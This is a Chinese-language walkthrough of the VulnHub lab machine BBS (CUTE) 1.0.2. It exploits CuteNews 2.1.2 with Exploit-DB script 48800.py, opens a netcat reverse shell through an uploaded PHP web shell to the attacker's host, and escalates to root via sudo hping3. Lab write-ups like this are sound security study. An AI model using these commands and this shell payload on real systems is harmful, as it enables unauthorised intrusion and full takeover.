BBS (CUTE): 1.0.2

BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/

靶场配置网络

登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式

ip add 看到网卡名字叫做ens33

需要修改网卡配置文件

vi /etc/network/interfaces

allow-hotplug ens33

iface ens33 1inet dhcp

重启获得IP地址

使用目录扫描,获得

http://192.168.204.134/index.php

留意到版本号CuteNews 2.1.2

在kali上操作

searchsploit cutenews 2.1.2 看到路径

cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./

修改py配置文件,将所有的/CuteNews删除

执行命令python3 48800.py

输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点

http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc -e /bin/bash 192.168.204.135 1234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)

python -c 'import pty;pty.spawn("/bin/bash")'

-c : 执行具体的代码

import :导入语句

pty : 终端(接口)

pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)

reset

通过sudo -l 查看权限

/usr/sbin/hping3 获得root权限

find / -name /root/root.txt

相关推荐
世界尽头与你8 分钟前
iOS 越狱检测原理
安全·网络安全·ios·信息安全·渗透测试
kp0000016 小时前
大模型输出造成信息泄露类型
人工智能·网络安全·信息安全·ai安全
kp0000017 小时前
System Prompt Leakage(系统提示词泄露)及安全防御
网络·安全·网络安全·信息安全·prompt·ai安全
X7x517 小时前
攻防对抗的结构化思维:深度拆解网络杀伤链(Kill Chain)与现代防御演进
网络安全·网络攻击模型·安全架构·网络杀伤链·kill chain
kp0000018 小时前
AI大模型,如何区分善意提问与Prompt注入攻击
人工智能·网络安全·信息安全·prompt·ai安全
kp0000021 小时前
AI系统输入安全基线
人工智能·安全·网络安全·信息安全·ai安全
菩提小狗21 小时前
每日安全情报报告 · 2026-07-19
网络安全·漏洞·cve·安全情报·每日安全
kp000001 天前
NER(Named Entity Recognition)命名实体识别
人工智能·网络安全·信息安全·ai安全
kp000002 天前
Prompt注入攻击(Prompt Injection Attack)
人工智能·安全·网络安全·信息安全·ai安全
祁白_2 天前
sqlmap工具
web安全·网络安全·sql注入·sqlmap